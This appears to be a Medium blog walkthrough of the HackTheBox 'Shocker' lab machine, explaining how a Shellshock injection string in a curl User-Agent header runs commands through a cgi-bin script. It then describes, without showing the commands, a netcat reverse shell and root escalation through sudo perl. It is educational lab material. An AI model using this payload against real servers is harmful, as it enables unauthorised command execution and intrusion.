HackTheBox: Shocker Walkthrough

Shellshock was one of the most famous vulnerabilities of the last decade, if not ever. The vulnerability existed because of how bash interpreted the specific string “() { : ; };”. Using this string, a user could inject any command they wanted. Shocker provides an easy machine to demonstrate this ability, so let’s get into it.

Enumeration

This revealed a web server with ssh enabled. Pretty standard stuff. I decided to run gobuster and visit the webpage to enumerate further after this:

Gobuster initially revealed nothing, but running it again with the --addslash flag revealed much more. After that, I searched within cgi-bin for potential scripts that could be publicly accessible. I found a script called user.sh, which is interesting.

Visiting the website yielded nothing of interest.

Back to the script I found. Its existence, in combination with the version of Apache discovered in the nmap scan, indicates there’s a high probability that this server is vulnerable to Shellshock.

I decided to try to exploit that.

Exploitation

Notes about the command: -H set the User-Agent header to “() { :; }; echo Content-Type: text/html; echo; echo “hello” “. The first part is obviously the famous Shellshock command. The second part, “echo Content-Type: text/html”, makes the output human-readable via curl. The third part is required for running the exploit against Apache and simply prints a blank line. The last part is the command we want to run. Moving on.

The curl statement return hello, which is exactly what we wanted.

Now to exploit the vulnerability, I simply created a reverse shell and caught it with netcat, which went like this:

Got a shell. Now time for some internal enumeration and privesc.

Internal Enumeration and Privilege Escalation

Shelly can run perl scripts as root. The path to root is obvious now, and looks like this:

So that’s it!

This box was an easy boot-to-root and a great medium for learning a bit of computer science history. Until next time!

--

--

Freelance cybersecurity consultant based in Düsseldorf, Germany.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Matt Johnson

Freelance cybersecurity consultant based in Düsseldorf, Germany.